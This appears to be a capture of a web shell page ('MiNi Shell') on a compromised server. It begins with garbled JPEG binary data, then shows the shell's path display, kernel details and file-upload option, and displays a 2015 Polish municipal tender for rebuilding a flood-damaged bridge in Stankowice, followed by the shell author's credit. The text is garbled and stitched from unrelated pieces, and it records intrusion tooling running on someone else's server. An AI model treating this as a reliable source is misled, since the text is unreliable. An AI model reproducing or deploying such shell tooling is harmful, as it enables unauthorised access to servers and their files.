JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20150731/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20150731/195430-N-2015.html

<p class="kh_header"><b>Leśna: Odbudowa mostu w ciągu drogi gminnej nr 142 w Stankowicach 
[powódź lipiec 2013 r.]</b><br>
<b>Numer ogłoszenia: 195430 - 2015; data zamieszczenia: 31.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Leśna , Rynek 19, 59-820 Leśna, woj. dolnośląskie, tel. 075 7211239, faks 075 7242368.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lesna.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbudowa mostu w ciągu drogi gminnej nr 142 w Stankowicach 
[powódź lipiec 2013 r.].</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> W ramach zadania planuje się wykonanie robót budowlanych w zakresie odbudowy mostu w ciągu dogi gminnej 142 w Stankowicach . Opis zakresu prac przedstawiony został poniżej:

1.	Istniejący stan zagospodarowania terenu.
Przedmiotowy obiekt - most drogowy znajduje się na cieku R-K w km 1+350 
w miejscowości Stankowice, w gminie Leśna. W miejscu tym znajduje się droga gminna stanowiąca dojazd do szkoły. Droga dojazdowa w obrębie przedmiotowego obiektu jest drogą o nawierzchni asfaltowej zniszczonej na skutek powodzi. Przekrój normalny składa się z jezdni o szerokości ok. 3,0m. Droga, w ciągu której usytuowany jest przedmiotowy obiekt jest drogą gminną klasy D. Most objęty opracowaniem wykonany jest w formie płyty żelbetowej wspartej na belkach stalowych. Belki stalowe zaś posadowione są na przyczółkach z kamienia. Przedmiotowy most posiada elementy zabezpieczenia zarówno dla pojazdów jak i dla pieszych w formie barierek stalowych. Konstrukcja mostu została naruszona w wyniku nawalnych opadów i następujących po nich wysokich przepływów, które znacznie przekroczyły wody o 1% prawdopodobieństwie wystąpienia- 
powódź lipiec 2013.
2.	Opis przyjętego rozwiązania.
Opracowanie przewiduje wykonanie prac związanych z odbudowaniem przyczółków 
z kamienia naturalnego, odbudową wlotów (skrzydełek) z kamienia, odbudowaniem części jezdnej konstrukcyjnej mostu oraz wykonaniem barier energochłonnych o długości 
2 x 6,0mb. W projekcie odbudowy mostu przyjęto obliczenia dla konstrukcji o obciążeniach jak dla kl. B. Dokumentacja przewiduje rozebranie uszkodzonej konstrukcji istniejącego mostu (płyta betonowa wsparta na belkach stalowych wys. 18cm). Kolejną czynnością jest wykonanie fundamentów żelbetowych pod przyczółki i skrzydełka z kamienia naturalnego na zaprawie. Ławy fundamentowe pod projektowane przyczółki o wymiarach 1,34x0,5m 
i długości 6,55m, należy wykonać z betonu klasy C25/30 W8 F150, zbrojonego stalą żebrowaną RB400W zgodnie z dokumentacją rysunkową. Pod fundamentami wykonać warstwę wyrównawczą z betonu klasy C12/15 o grubości 10cm. Ławy należy wykonać jako
elementy monolitycznie połączone z przyczółkami. Ławy fundamentowe pod projektowane skrzydełka o wymiarach 1,34x0,5m, należy wykonać z betonu klasy C25/30 W8 F150, zbrojonego stalą żebrowaną RB400W zgodnie z dokumentacją rysunkową. Pod fundamentami wykonać warstwę wyrównawczą z betonu klasy C12/15 o grubości 10cm. Gdy fundamenty uzyskają swoją nośność należy wykonać przyczółki wraz ze skrzydełkami, murowane z kamienia naturalnego na zaprawie cementowej. Zaprojektowano przyczółki, oraz skrzydełka o grubości równej 50-74cm. Po czym należy wykonać poduszki żelbetowe pod konstrukcję nośną mostu z betonu klasy C25/30 W8 F150, zbrojonego stalą żebrowaną RB400W. Na poduszce żelbetowej i podkładkach stalowych z blachy grubości 12mm 
i wymiarach 15x20cm, ułożyć konstrukcję nośną z belek dwuteowych HEB 220mm 
w rozstawie co 80cm. Następnie należy wykonać płytę żelbetową o grubości zmiennej 20cm i wymiarach 6,0 x 6,35m z betonu klasy C25/30 W8 F150, zbrojonego stalą żebrowaną RB400W. W trakcie wykonywania zbrojenia płyty pomostowej należy na jej skraju zamontować obustronne kanały technologiczne z rur PVC100 o długości 6,0mb każdy. Zaprojektowano dwa rodzaje izolacji przeciwwilgociowych: wszystkie elementy betonowe i żelbetowe stykające się z gruntem oraz nawierzchnią mineral.- bitum. Należy zabezpieczyć poprzez nałożenie warstwy lepiku bitumicznego lub papy termozgrzewalnej, płytę mostową (pod projektowaną nawierzchnię drogi) należy wykonać z dwóch warstw papy termozgrzewalnej. Po zabezpieczeniu przeciwwilgociowym konstrukcji mostu, przyczółki oraz mur oporowy przysypać należy mieszanką gruntowo-piaskową ( w stosunku 50/50%). Dodatkowo przy najazdach mostowych o długości 3,0m wykonać warstwę odcinającą piaskową gr. 10cm, podbudowę z kruszywa łamanego - dolnej (frakcja 0-63mm) o gr. 15cm, oraz górnej (frakcja 0-31,5mm) o gr.10cm. Dokumentacja przewiduje również wykonanie nawierzchni z mieszanki mineralno-bitumicznej w rejonie odbudowywanego mostu o łącznej grubości 8 cm: (0/20mm) 4cm - warstwa wiążąca, (0/12,8mm) 4cm - warstwa ścieralna. Po obu stronach odbudowywanego mostu projektuje się montaż mostowych barieroporęczy energochłonnych typu BSB-140C, ze słupkami rozmieszczonymi w rozstawie 1,33m. Każda z barier o długości 6,0mb. Zgodnie z dokumentacją rysunkową na całej długości cieki R-K, należy wybrukować dno cieku kamieniem naturalnym o grubości 20cm na ławie betonowej grubości 15cm. 
Dylatacje
Na styku konstrukcji nośnej mostu ze skrzydełkami należy zastosować dylatacje z wypełnieniem styropianem gr. 10mm. Obwodowo wyłożyć sznur konopny smołowany, a następnie krawędzie zabezpieczyć poliuretanową, tiksotropową masą dylatacyjną.
Warstwy konstrukcyjne mostu:
- belki stalowe dwuteowe HEB 220mm w rozstawie co 80cm
- płyta żelbetowa gr. 20cm,
- izolacja przeciwwilgociowa - 2x papa termozgrzewalna,
- warstwa wiążąca (0-20mm) mineralno-bitumiczna gr. 4cm,
- warstwa ścieralna (0-12,8mm) mineralno-bitumiczna gr. 4cm.
Warstwy konstrukcyjne drogi przy najazdach:
- zasypka gruntowo-piaskowa przyczółków mostu (50/50%),
- warstwa odcinająca piaskowa gr. 10cm,
- podbudowa z kruszywa łamanego - dolna (frakcja 0-63mm) gr. 15cm,
- podbudowa z kruszywa łamanego - górna (frakcja 0-31,5mm) gr. 10cm,
- warstwa wiążąca (0-20mm) mineralno-bitumiczna gr. 4cm,
- warstwa ścieralna (0-12,8mm) mineralno-bitumiczna gr. 4cm.
Odwodnienie mostu
Odwodnienie mostu stanowić będzie odpowiednio wyprofilowany przekrój podłużny niwelety jezdni.
Wykopy fundamentowe
1) Zalecenia ogólne.
Wykopy i roboty fundamentowe prowadzić przy niskim stanie wód w potoku Bruśnik. Na wypadek wystąpienia podwyższonego stanu wód zachować ciągłość wałów przeciwpowodziowych poprzez np. wykorzystanie grodzi tymczasowej na szerokości wykopów. Należy tak zaplanować harmonogram robót, aby etapy prac związane z wykonywaniem fundamentów i ścian przyczółków prowadzić w maksymalnie krótkim czasie i po wykonaniu ścian przyczółków natychmiast wykonać zasypy, doprowadzić koryto i wały do stanu projektowanego lub przywrócić do stanu przed rozpoczęciem wykopów. W rejonie obiektu nie zidentyfikowano żadnych urządzeń obcych, jednakże przed przystąpieniem do wykonywania wykopów pod fundamenty, Wykonawca jest zobowiązany do zinwentaryzowania urządzeń obcych ewentualnie występujących na terenie przewidzianym pod prace budowlane. W przypadku wystąpienia urządzeń obcych w rejonie obiektów należy je zdemontować, przełożyć lub zabezpieczyć zgodnie z odpowiednimi projektami branżowymi, przed przystąpieniem do wykonywania robot ziemnych. Urządzenia te należy
lokalizować wg aktualnych podkładów mapowych i projektów branżowych.
2) Wykonywanie wykopów.
Dno wykopów jakie należy wykonać ze względu na betonowanie fundamentów podpór znajduje się poniżej nawierconego w trakcie badań geotechnicznych podłoża zwierciadła wody. Z tego względu zachodzi konieczność wykonania wykopów w osłonach szczelnych. Ponadto ze względu na występowanie w podłożu gruntów spoistych, wykopy należy zabezpieczyć przed napływem wód opadowych.
UWAGA!!!
Nośność użytkową mostu ustala się na 30 ton !
3.	Zestawienie danych technicznych:
- fundamenty żelbetowe przyczółków o wym. 1,34x0,5x6,55m - 8,78 m3,
- fundamenty żelbetowe skrzydełek o wym. 0,9x0,5m - 6,25 m3,
- konstrukcja nośna żelbetowa mostu (płyta mostowa gr. 20cm z poduszkami) - 9,02 m3,
- przyczółki z kamienia naturalnego na zaprawie gr. 0,5-0,74m - 19,52 m3,
- skrzydełka z kamienia naturalnego na zaprawie gr. 0,5-74m - 11,20 m3,
- belki stalowe dwuteowe HEB220 dł. 3,37mb - 8szt.,
- podkładki pod belki stalowe z blachy gr. 12mm i wym. 15x20cm - 8szt.,
- brukowanie dna cieku z kamienia gr. 20cm na betonie gr. 15cm - 38,70 m2,
- barieroporęcze mostowe typu BSB-140C - 12,0 mb,
- nawierzchnia mineralno-bitumiczna o gr. 8cm - 54,60 m2,
- kanały technologiczne z rur PVC100 - 12,0 mb.

Szczegółowy opis przedmiotu zamówienia stanowią następujące załączniki: 
Załącznik nr 1 do SIWZ	Specyfikacja techniczna wykonania i odbioru robót
Załącznik nr 2 do SIWZ	Dokumentacja Projektowe
Załącznik nr 3 do SIWZ	Przedmiar robót.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>.Zamawiający przewiduje udzielenie wykonawcy zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 UPzp, polegających na wykonaniu tego samego rodzaju zamówień, co objęte zamówieniem podstawowym. Zamawiający udzieli zamówień uzupełniających tylko wtedy, gdy będzie posiadał środki finansowe na ich wykonanie. Łączna wartość zamówień uzupełniających nie może przekroczyć 20% wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.22.11.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Zamawiający żąda od Wykonawcy wniesienia wadium w wysokości 2 000 tysięcy złotych (słownie: dwa tysiące złotych) 
Wadium należy wnieść przed upływem terminu składania ofert.
Wadium może być wnoszone w jednej lub w kilku następujących formach, zgodnie z art. 45 ustawy Prawo zamówień publicznych tj.:
1)	w pieniądzu,
2)	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	w gwarancjach bankowych,
4)	w gwarancjach ubezpieczeniowych,
5)	w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).
Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy: 
nr 69 8392 0004 4200 1368 3000 0010 w Łużyckim Banku Spółdzielczym w Lubaniu Oddział w Leśnej.
Wadium wnoszone w innej formie niż w pieniądzu należy umieścić w osobnej kopercie, opisanej (WADIUM) i włożyć do koperty zawierającej ofertę.
2.	Wykonawca, który nie wniesie wadium na okres związania ofertą zostanie przez Zamawiającego wykluczony z postępowania.
3.	Wadium będzie zwracane na warunkach określonych w art. 46 ustawy Prawo zamówień publicznych.
4.	Zamawiający zatrzyma wadium na warunkach określonych w art. 46 ustawy Prawo zamówień publicznych.
5. W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje termin uznania kwoty na rachunku Zamawiającego.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się Wykonawcy, których wiedza i doświadczenie pozwoli na prawidłowe wykonanie zamówienia, w szczególności o zamówienie mogą ubiegać się Wykonawcy, którzy w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali co najmniej jedną robotę budowlaną rodzajem odpowiadającą przedmiotowi zamówienia tj. budowie, odbudowie, przebudowie, remoncie mostu o wartości nie mniejszej niż 80.000,00 zł brutto oraz załączenie dokumentu potwierdzającego, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">oświadczenie o treści załącznika nr 5 do SIWZ</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>formularz ofertowy, dowód wniesienia wadium, uproszczony kosztorys ofertowy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - okres gwarancji - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający na podstawie art. 144 ust. 1 ustawy Prawo zamówień publicznych określa następujące okoliczności, które mogą  powodować konieczność wprowadzenia zmian                 w treści zawartej umowy w stosunku do treści złożonej oferty:
1. Zamawiający przewiduje zmianę postanowień umowy w przypadku:
1.1.  ustawowej zmiany wysokości podatku VAT, 
1.2. konieczności zmiany zakresu prac, wynikająca z wprowadzenia w dokumentacjach projektowych istotnych lub nieistotnych zmian w rozumieniu ustawy Prawo budowlane, 
1.3. konieczności wykonania prac wynikających ze zleceń organów administracji architektoniczno-budowlanej, np. nadzoru budowlanego, wydanych stosownie do ich właściwości, 
1.4. konieczności wykonania robót zamiennych, nie wykraczających poza zakres przedmiotu zamówienia, których wprowadzenie będzie konieczne dla wykonania całości robót 
i uzyskania założonego efektu użytkowego, 
1.5. istotnych braków lub błędów w dokumentacji projektowej, również tych polegających         na niezgodności dokumentacji z przepisami prawa, 
1.6. zaistnienia uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne                dla Zamawiającego, 
1.7. zmiany danych podmiotowych dotyczących Wykonawcy, lokalizacji siedziby Wykonawcy, 
2. konieczności przedłużenia terminu umowy z powodu: 
a) działania Siły Wyższej, tj. wyjątkowego zdarzenia lub okoliczności; które uniemożliwiają wykonanie robót budowlanych,
b)  z przyczyn zależnych od Zamawiającego,
c) wystąpienia takich czynników atmosferycznych w czasie realizacji robót, które uniemożliwiają prawidłową realizację przedmiotu umowy. 
d) działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron. 
e) z przyczyn niezależnych od Wykonawcy.
Zmiany umowy wymagają formy pisemnej - aneks do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http:bip.umlesna.nv.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Leśnej, ul. Świerczewskiego 11B, I piętro pok. nr 7..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.08.2015 godzina 09:30, miejsce: Urząd Miejski w Leśnej, ul.Rynek 19, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie dofinansowane jest ze środków budżetu państwa przeznaczonych na usuwanie skutków klęsk żywiołowych - powódź lipiec 2013r..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com